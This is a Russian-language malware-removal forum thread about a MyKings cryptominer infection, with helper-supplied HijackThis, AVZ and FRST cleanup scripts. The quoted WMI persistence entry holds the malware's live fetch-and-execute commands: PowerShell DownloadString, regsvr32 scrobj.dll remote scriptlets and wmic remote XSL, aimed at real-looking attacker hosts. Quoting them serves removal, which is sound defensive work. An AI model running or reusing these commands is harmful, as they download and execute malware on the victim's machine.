Заражен MyKings (Trojan.W32.Miner)

Printable View

24.08.2021, 13:23
lexperience

Вложений: 1

Заражен MyKings (Trojan.W32.Miner)

[ATTACH=CONFIG]685657[/ATTACH]
Появляется conhoy.exe
Удаляешь его и он вновь появляется раз в 3 часа.
Вызывает это PowerShell скрипт который запускает что-то из папки C:\Windows\Fonts\Fonts\
24.08.2021, 13:25
Info_bot

Уважаемый(ая) [B]lexperience[/B], спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
24.08.2021, 22:05
Vvvyg

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://155.94.235.39:8039/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"[/code]
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('C:\Users\user\AppData\Local\syslog\syslog.exe', '');
QuarantineFile('c:\windows\fonts\fonts\svchost.exe', '');
QuarantineFile('C:\windows\fonts\My\svchost.exe', '');
QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
QuarantineFile('C:\Windows\Fonts\smss.exe', '');
QuarantineFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', '');
QuarantineFile('C:\Windows\system32\ftp2.txt', '');
QuarantineFile('C:\Windows\system32\ftp5.txt', '');
QuarantineFile('c:\windows\web\1.exe', '');
QuarantineFile('c:\windows\web\2.exe', '');
QuarantineFile('c:\windows\web\3.exe', '');
QuarantineFile('c:\windows\web\n.exe', '');
DeleteFile('C:\Program Files\Avast Software\Avast\AvEmUpdate.exe', '32');
DeleteFile('C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe', '64');
DeleteFile('C:\Program Files\Common Files\avast software\overseer\overseer.exe', '64');
DeleteFile('C:\Users\user\AppData\Local\syslog\syslog.exe', '64');
DeleteFile('c:\windows\fonts\fonts\svchost.exe', '64');
DeleteFile('C:\windows\fonts\My\svchost.exe', '64');
DeleteFile('C:\Windows\Fonts\Mysql\svchost.exe', '64');
DeleteFile('C:\Windows\Fonts\smss.exe', '');
DeleteFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', '64');
DeleteFile('C:\Windows\system32\ftp2.txt', '64');
DeleteFile('C:\Windows\system32\ftp5.txt', '64');
DeleteFile('c:\windows\web\1.exe', '64');
DeleteFile('c:\windows\web\2.exe', '64');
DeleteFile('c:\windows\web\3.exe', '64');
DeleteService('aswbIDSAgent');
DeleteService('avast! Antivirus');
DeleteService('ECSIoDriver_1_1_0_0');
DeleteService('MicrosoftMysql');
DeleteService('niarbk');
DeleteService('nibffrk');
DeleteService('nicdrk');
DeleteService('Nidaq32k');
DeleteService('nidevldu');
DeleteService('nidimk');
DeleteService('nidmmk');
DeleteService('nidmxfk');
DeleteService('nidsark');
DeleteService('niesrk');
DeleteService('nilvaik');
DeleteService('nimdbgk');
DeleteService('nimdsk');
DeleteService('nimru2k');
DeleteService('nimsdrk');
DeleteService('nimslk');
DeleteService('nimsrlk');
DeleteService('nimstsk');
DeleteService('nimxdfk');
DeleteService('nimxpk');
DeleteService('niorbk');
DeleteService('NIPALK');
DeleteService('nipxirmk');
DeleteService('nipxirmu');
DeleteService('niscdk');
DeleteService('nisdigk');
DeleteService('nispdk');
DeleteService('nissrk');
DeleteService('nistc2k');
DeleteService('nistck');
DeleteService('nistcrk');
DeleteService('niswdk');
DeleteService('nitiork');
DeleteService('niwfrk');
DeleteService('nixsrk');
DeleteService('OfficeSoft');
DeleteService('QHActiveDefense');
DeleteService('UbarCalloutDriver');
DeleteService('WinIniter');
DeleteService('WinIniters');
DeleteFileMask('c:\users\user\appdata\local\syslog', '*', true);
DeleteDirectory('c:\users\user\appdata\local\syslog');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{472083B0-C522-11CF-8763-00608CC02F24}', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QHSafeTray', 'x64');
DeleteSchedulerTask('{5E3166BF-0DAF-47A1-BB40-63171950E5CE}');
DeleteSchedulerTask('syslog');
DeleteSchedulerTask('Update2');
DeleteSchedulerTask('Update3');
DeleteSchedulerTask('Update4');
DeleteSchedulerTask('Windows_Update');
DeleteSchedulerTask('WindowsUpdate1');
DeleteSchedulerTask('WindowsUpdate3');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке [COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR] над над первым сообщением в теме.

Скачайте, распакуйте и запустите [url=http://virusinfo.info/soft/tool.php?tool=ClearLNK]утилиту ClearLNK[/url]. Скопируйте текст ниже в окно утилиты и нажмите "[B]Лечить[/B]".[CODE]>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Kerbal Space Program.lnk" -> ["D:\КСП\Kerbal Space Program\KSP_x64.exe"]
>>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WXtoImg\Manual.lnk" -> ["C:\Program Files (x86)\WXtoImg\wxgui.pdf"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Удалить игру.lnk" -> ["D:\КСП\Kerbal Space Program\unins000.exe"]
>>> "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Orbitron Screen Saver.lnk" -> ["C:\Windows\System32\Orbitron.scr"]
>>> "C:\Users\user\Desktop\Программы для работы\Google Earth.lnk" -> ["C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Scratch.lnk" -> ["C:\Program Files (x86)\Scratch\Scratch.exe" =>> "C:\Program Files (x86)\Scratch\Scratch.image"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Uninstall Scratch.lnk" -> ["C:\Program Files (x86)\Scratch\uninstall.exe"]
>>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\Русский.lnk" -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_rus.pdf"]
>>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\English.lnk" -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_eng.pdf"]
>>> "C:\Users\user\Desktop\Другие программы\Google Earth Pro.lnk" -> ["C:\Program Files (x86)\Google\Google Earth Pro\client\googleearth.exe"]
>>> "C:\Users\user\Desktop\Программы для работы\Skype.lnk" -> ["C:\Program Files (x86)\Skype\Phone\Skype.exe"]
>>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Viber.lnk" -> ["C:\Users\user\AppData\Local\Viber\Viber.exe" =>> ShareFiles]
>>> "C:\Users\user\Desktop\Игры\Epic Games Launcher.lnk" -> ["D:\эпикгамес\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe"]
>>> "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\A.PIF" -> ["C:\WORKING\NEPTUN\A.EXE"]
>>> "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\N.PIF" -> ["C:\WORKING\NEPTUN\N.EXE"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"]
>>> "C:\Users\Public\Desktop\360 Total Security.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Уязвимости.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe" =>> /leakfix]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Borland C++Builder 6\Help\Intranet ActiveX Online Help.lnk" -> ["C:\Program Files (x86)\Borland\CBuilder6\Help\nia.hlp"]
>>> "C:\Users\user\Desktop\Другие программы\Movavi Video Editor 15.lnk" -> ["E:\Movavi\Movavi Video Editor 15\VideoEditor.exe"]
>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Super Bunny man\Деинсталлировать awd.lnk" -> ["D:\Super Bunny Man\Super Bunny Man\Super Bunny man\Uninstall\unins000.exe"][/CODE]Отчёт о работе прикрепите.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B].

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
25.08.2021, 00:02
lexperience

Вложений: 2

Вот отчеты
25.08.2021, 07:55
Vvvyg

Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
CreateRestorePoint:
GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ
Task: {01C18C21-ECEA-4B5E-AD03-46CDBFA8042E} - \Mysa -> Нет файла <==== ВНИМАНИЕ
Task: {0CE665BC-7A55-4FC4-B8F6-478A1889C016} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {23BCF218-F9A3-453C-9B50-1AC3982E5D3E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [1760360 2020-08-29] (Avast Software s.r.o. -> Avast Software)
Task: {3A820F8D-4A74-4235-A585-A86D265A4530} - \ok -> Нет файла <==== ВНИМАНИЕ
Task: {5F5278CB-0A8E-46E1-AF1F-B6A5413C39AD} - \oka -> Нет файла <==== ВНИМАНИЕ
Task: {6B17F88A-CBED-4107-ABA6-1C0F4587C3DC} - \Mysa1 -> Нет файла <==== ВНИМАНИЕ
Task: {DAF93FCE-EDC8-49A5-AD2A-344C4439ACDF} - \Mysa3 -> Нет файла <==== ВНИМАНИЕ
Task: {E394AFCF-5D66-46D4-92C5-86C3CC99AA86} - \Mysa2 -> Нет файла <==== ВНИМАНИЕ
Task: C:\Windows\Tasks\Avast Emergency Update.job => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe
CHR HKU\S-1-5-21-2322360559-2472836408-2810273341-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [glcimepnljoholdmjchkloafkggfoijh]
S2 IPSAFES; C:\Windows\Fonts\lsass.exe [0 2019-08-12] () <==== ВНИМАНИЕ (нулевой байт Файл/Папка)
C:\Windows\Fonts\lsass.exe
S3 aswbIDSAgent; "C:\Program Files\Avast Software\Avast\aswidsagent.exe" [X]
S2 avast! Antivirus; "C:\Program Files\Avast Software\Avast\AvastSvc.exe" /runassvc [X]
2019-08-12 12:13 - 2019-08-12 12:13 - 000000000 ____D () C:\ProgramData\svhost.exe
2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\My Web Shield
2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\UBar
2016-12-18 18:10 C:\Program Files (x86)\Smart Application Controller
2016-12-18 18:10 C:\Program Files (x86)\Youtube AdBlock
2016-12-18 18:10 C:\ProgramData\hdtask
2016-12-18 18:10 C:\ProgramData\UBar
2016-12-18 18:10 C:\Users\user\AppData\Roaming\PBot
2016-12-18 18:10 C:\Users\user\AppData\Roaming\PriceNavigator
2016-12-18 18:10 C:\Users\user\AppData\Roaming\SimpleCalculator
2016-12-18 18:10 C:\Users\user\AppData\Roaming\Smart Application Controller
2016-12-18 18:10 C:\Users\user\AppData\Roaming\VulcanLinks
2016-12-18 18:10 C:\Users\user\AppData\Local\calk
2016-12-18 18:10 C:\Users\user\AppData\Local\fupdate
S2 conhost; C:\Program Files (x86)\Google\13994553.dll [X]
R1 360AntiHacker; C:\Windows\System32\Drivers\360AntiHacker64.sys [190680 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S3 360AvFlt; C:\Windows\System32\DRIVERS\360AvFlt.sys [86248 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 360Box64; C:\Windows\System32\DRIVERS\360Box64.sys [337280 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S3 360Camera; C:\Windows\System32\Drivers\360Camera64.sys [49088 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 360FsFlt; C:\Windows\System32\DRIVERS\360FsFlt.sys [457672 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S4 360Hvm; C:\Windows\System32\Drivers\360Hvm64.sys [322944 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360安全中心)
S3 360netmon; C:\Windows\System32\DRIVERS\360netmon.sys [87672 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 BAPIDRV; C:\Windows\System32\DRIVERS\BAPIDRV64.sys [219520 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
U3 aswbdisk; отсутствует ImagePath
U3 aswblog; отсутствует ImagePath
C:\Windows\System32\Drivers\360AntiHacker64.sys
C:\Windows\System32\DRIVERS\360AvFlt.sys
C:\Windows\System32\DRIVERS\360Box64.sys
C:\Windows\System32\Drivers\360Camera64.sys
C:\Windows\System32\DRIVERS\360FsFlt.sys
C:\Windows\System32\Drivers\360Hvm64.sys
C:\Windows\System32\DRIVERS\360netmon.sys
C:\Windows\System32\DRIVERS\BAPIDRV64.sys
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers4: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers6: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\72983560.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\72983560.sys => ""="Driver"
SearchScopes: HKU\S-1-5-21-2322360559-2472836408-2810273341-1000 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
BHO-x32: Поиск@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\user\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll => Нет файла
BHO-x32: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon.dll => Нет файла
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll => Нет файла
MSCONFIG\startupreg: ctfmon => C:\Windows\Fonts\lsass.exe
C:\Program Files (x86)\360\Total Security
FirewallRules: [{CCC877C1-0690-4257-9542-61B4F09614B8}] => (Allow) C:\Program Files\UBar\ubar.exe => Нет файла
FirewallRules: [TCP Query User{6795AA6A-9235-4468-8ED8-81C0673914A9}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла
FirewallRules: [UDP Query User{7A13CE18-5EDE-4311-85C0-EE0791111BEC}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла
FirewallRules: [TCP Query User{8548ED64-D023-444F-BB6C-168A11BAA40E}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла
FirewallRules: [UDP Query User{172CF716-F833-4FCF-BEF7-8C421C681213}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла
FirewallRules: [TCP Query User{9AFDE64F-8C66-4A88-9574-91F10E233A17}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{3A3E7546-0204-4702-90AC-CC92E38DCF2C}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{3D294330-B21D-4240-ABF4-6E79387B3A84}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла
FirewallRules: [UDP Query User{D4B21FAA-2A83-4456-9965-4C83E8C48BD1}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла
FirewallRules: [TCP Query User{29F98A47-8F9E-4E23-A218-9984D38EB176}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла
FirewallRules: [UDP Query User{6BE6EFC4-5A4F-4957-BA20-47486CCC6C15}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла
FirewallRules: [TCP Query User{AF36DDC7-221D-4753-BA88-CFA1F348FB7C}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла
FirewallRules: [UDP Query User{BCE3AF80-0ACD-4D25-A3B8-7B1152232DB9}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла
FirewallRules: [TCP Query User{C50544F2-1E96-4031-A068-302E95DCC223}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла
FirewallRules: [UDP Query User{A3319220-92CD-4EFC-AF56-DB03426EED15}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла
FirewallRules: [TCP Query User{674E2599-23BA-4BBF-8AFB-6E2212EA6BD3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{CF339C0E-21C0-4CFD-9EC8-42E3AD92E5E3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{7D979D98-9A73-4B8C-99A3-C2AF556A1096}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла
FirewallRules: [UDP Query User{40BDD61E-4A62-45B2-8632-923FBAAF2D85}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла
FirewallRules: [{8ADD07F2-9134-418F-BA1F-6315F36D6029}] => (Allow) D:\Winamp\winamp.exe => Нет файла
FirewallRules: [{546A58F9-FE2E-4C76-A006-E3F25BED7B39}] => (Allow) D:\Winamp\winamp.exe => Нет файла
FirewallRules: [TCP Query User{1AFF9F98-FFC3-4D0A-93AE-C38EFBDC92BF}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла
FirewallRules: [UDP Query User{F5930C31-7A32-4C9A-BDCC-BC58FD23BAE0}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла
FirewallRules: [TCP Query User{6A4584F6-D362-4FC6-A731-89101AF3F4DB}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{087E997D-9C78-47AA-882C-07ADAEAA2B09}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{481AD368-8107-4CA6-BB62-503575B2C84A}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла
FirewallRules: [UDP Query User{56FA2711-ACEC-40C6-ACE6-75D2F47FA8CD}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла
FirewallRules: [{6A861891-2505-4EF2-BC1E-7CF08974F695}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла
FirewallRules: [{0805A51D-B04C-4363-96E4-32761C90EA78}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла
FirewallRules: [{1245AFDE-E5BF-405A-B82B-F7146BEBC8B3}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла
FirewallRules: [{F0265202-48EA-437D-9B2F-A0FB88DE4725}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла
FirewallRules: [{5F5747B9-6C1C-4235-92F7-52E77C9019F4}] => (Block) LPort=139
FirewallRules: [{4DFFC814-BFF6-441E-A699-4700CCB82ED5}] => (Block) LPort=445
FirewallRules: [{E50F0281-E106-4EE6-8752-225204036708}] => (Block) LPort=139
FirewallRules: [{C1AD65BA-C529-45D2-8E6C-EF0ADBE88F58}] => (Block) LPort=445
FirewallRules: [{3B91FDD6-96EC-460C-BF48-BDA5312F5FDA}] => (Block) LPort=139
FirewallRules: [{A8BD5F90-6A39-4141-BBEA-1EA2FDD4154F}] => (Block) LPort=445
FirewallRules: [{E106989E-349D-425D-A870-B1EE565108EE}] => (Block) LPort=139
FirewallRules: [{89277402-E6B1-4AFC-B0D1-5982D37A1D43}] => (Block) LPort=445
FirewallRules: [{1011CF0E-26B6-4D68-8AF9-4C11B0079BEE}] => (Block) LPort=139
FirewallRules: [{5CF5ED9F-6DE7-4DB6-AB4B-DCF1A66C877E}] => (Block) LPort=445
FirewallRules: [{C77F0541-62AA-4696-8B33-16CA497D0CA7}] => (Block) LPort=139
FirewallRules: [{FD592B4B-25A3-4833-AD0D-2D663552C49D}] => (Block) LPort=445
FirewallRules: [{C5055AF4-9C15-4B0B-A83B-9163D6106A68}] => (Block) LPort=139
FirewallRules: [{5A17AB39-E438-45D7-B729-9D25888DB836}] => (Block) LPort=445
FirewallRules: [{F62D4A98-F6FA-4365-A734-4DBD6D5990E4}] => (Block) LPort=139
FirewallRules: [{C7A8193D-3910-420B-967B-093B37418C2A}] => (Block) LPort=445
FirewallRules: [{2CE93B8E-C0B4-4587-A4F7-2B21C91A7697}] => (Block) LPort=139
FirewallRules: [{5E682B40-5C84-4622-978C-5863322E58EF}] => (Block) LPort=445
FirewallRules: [{91628AFE-586D-48A3-B6CE-326B784D50CF}] => (Block) LPort=139
FirewallRules: [{2643AC6F-C3C2-4A01-86CB-9E086DF062A4}] => (Block) LPort=445
FirewallRules: [{59378E9A-57F1-4C01-B6DB-B08A9C18889A}] => (Block) LPort=139
FirewallRules: [{BADA7B63-02BE-49F5-8427-4D82A8760F22}] => (Block) LPort=445
FirewallRules: [{0C62F18D-82FE-4A1A-843D-D2D176AA131A}] => (Block) LPort=139
FirewallRules: [{DBF10C81-44E5-4F52-B55F-00C14C4C19D0}] => (Block) LPort=445
FirewallRules: [{737FF17C-2E59-44EF-AE0D-9BB43EC6C7F7}] => (Block) LPort=139
FirewallRules: [{F98C8CFA-84BD-45D4-8B25-3A7C00E6FAD6}] => (Block) LPort=139
FirewallRules: [{288D8FED-5B43-4AA7-8EB6-50023FC46EE7}] => (Block) LPort=445
FirewallRules: [{BAE33902-11E4-40A5-AE46-E537DCDEF1A8}] => (Block) LPort=445
FirewallRules: [{BE13D01B-5366-41EF-98D4-0D0CE6E2BCED}] => (Block) LPort=139
FirewallRules: [{7E589B4E-977E-4176-9A2D-9B4D223D755B}] => (Block) LPort=445
FirewallRules: [{A8266260-EF5D-4435-AEA8-A65F5D43972C}] => (Block) LPort=139
FirewallRules: [{3095AD51-A8F0-4DFA-B9BF-B6DA5C81EB9C}] => (Block) LPort=445
FirewallRules: [{73DB4631-7632-42DC-ADF3-AFFCA451FF30}] => (Block) LPort=139
FirewallRules: [{F3F01CD5-77D8-44B6-BE85-C9FD3501619B}] => (Block) LPort=139
FirewallRules: [{62101226-A22D-45AF-9B96-A957948150B6}] => (Block) LPort=445
